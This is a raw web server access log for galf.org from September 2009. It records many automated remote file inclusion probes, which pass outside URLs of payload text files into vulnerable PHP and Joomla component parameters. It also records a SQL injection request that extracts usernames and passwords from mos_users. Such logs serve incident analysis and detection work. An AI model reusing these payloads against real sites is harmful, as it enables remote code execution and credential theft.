117.110.59.2 - - [07/Sep/2009:09:49:35 -0700] "GET /logs/access_090511.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:35 -0700] "GET /logs/access_090511.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:40 -0700] "GET /logs/access_090511.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:44 -0700] "GET /logs/access_090427.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:44 -0700] "GET /logs/access_090316.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:49:46 -0700] "GET /logs/access_090309.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:49:52 -0700] "GET /logs/access_090525.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:49:52 -0700] "GET /logs/access_090427.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:50:04 -0700] "GET /logs/access_090803.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:50:09 -0700] "GET /logs/scripts.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:50:14 -0700] "GET /logs/access_090608.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:50:14 -0700] "GET /logs/access_090720.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:09:50:30 -0700] "GET /logs/scripts.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.57.78.8 - - [07/Sep/2009:09:51:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.57.78.8 - - [07/Sep/2009:09:51:07 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.57.78.8 - - [07/Sep/2009:09:51:08 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.23 - - [07/Sep/2009:09:51:56 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:51:56 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:51:56 -0700] "GET /logs/access_090629.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:09 -0700] "GET /logs/access_090629.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:09 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:09 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:11 -0700] "GET /logs/access_090420.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:19 -0700] "GET /logs/access_090420.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:24 -0700] "GET /logs/access_090511.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:24 -0700] "GET /logs/access_090427.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:34 -0700] "GET /logs/access_090316.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:35 -0700] "GET /logs/access_090511.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:35 -0700] "GET /logs/access_090427.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:52:43 -0700] "GET /logs/access_090316.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:53:16 -0700] "GET /logs/scripts.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:09:53:28 -0700] "GET /logs/scripts.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:54:29 -0700] "GET /logs/access_090216.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:54:29 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:54:29 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:09:54:42 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Sep/2009:09:54:42 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Sep/2009:09:54:42 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.110.59.2 - - [07/Sep/2009:09:55:16 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:55:16 -0700] "GET /logs/access_090216.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:55:16 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:09:55:28 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:09:55:28 -0700] "GET /logs/access_090316.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:09:55:29 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:09:55:33 -0700] "GET /logs/access_090216.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:56:28 -0700] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [07/Sep/2009:09:56:31 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [07/Sep/2009:09:56:31 -0700] "GET /appserv/main.php?appserv_root=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [07/Sep/2009:09:56:31 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.111.80.234 - - [07/Sep/2009:09:56:32 -0700] "GET /logs/access_090518.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:57:19 -0700] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:09:57:53 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Sep/2009:09:57:53 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Sep/2009:09:57:53 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Sep/2009:09:59:04 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
88.131.106.16 - - [07/Sep/2009:10:01:03 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [07/Sep/2009:10:01:04 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:10:04:52 -0700] "GET /logs/access_090622.log%20%20//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:10:04:53 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:10:04:56 -0700] "GET /?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:10:05:10 -0700] "GET /?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:10:05:10 -0700] "GET /logs/access_090622.log%20%20//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:10:05:10 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:10:05:30 -0700] "GET /logs/access_090223.log%20%20//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:10:05:54 -0700] "GET /logs/access_090601.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:10:05:55 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:10:05:55 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:10:06:07 -0700] "GET /logs/access_090223.log%20%20//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:10:06:28 -0700] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:10:06:28 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
209.139.209.74 - - [07/Sep/2009:10:06:52 -0700] "GET /logs/access.log/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
209.139.209.74 - - [07/Sep/2009:10:06:52 -0700] "GET /logs/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
209.139.209.74 - - [07/Sep/2009:10:06:52 -0700] "GET /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users-- HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
211.189.18.73 - - [07/Sep/2009:10:09:39 -0700] "GET /logs/access_090420.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.57.78.8 - - [07/Sep/2009:10:09:46 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:10:10:34 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:10:10:34 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:10:10:34 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
88.131.106.16 - - [07/Sep/2009:10:11:30 -0700] "GET /logs/ HTTP/1.0" 200 4783 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [07/Sep/2009:10:11:34 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [07/Sep/2009:10:11:39 -0700] "GET /?N=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [07/Sep/2009:10:11:40 -0700] "GET /?N=D HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [07/Sep/2009:10:11:42 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [07/Sep/2009:10:11:43 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:10:12:01 -0700] "GET /logs/access_090202.log%20//newspublish/include.php?path%5Bdocroot%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:10:12:01 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:10:12:04 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:10:12:47 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:10:12:47 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:10:12:47 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.209.182 - - [07/Sep/2009:10:13:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.182 - - [07/Sep/2009:10:13:10 -0700] "GET /logs/access_090202.log HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:10:13:36 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:10:13:36 -0700] "GET /logs/access.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:10:13:36 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:10:13:37 -0700] "GET /logs/access.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:10:13:38 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:10:13:38 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [07/Sep/2009:10:14:08 -0700] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [07/Sep/2009:10:14:08 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [07/Sep/2009:10:14:08 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [07/Sep/2009:10:14:30 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [07/Sep/2009:10:14:30 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [07/Sep/2009:10:14:30 -0700] "GET /logs/access_090202.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:10:14:53 -0700] "GET /logs/access.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.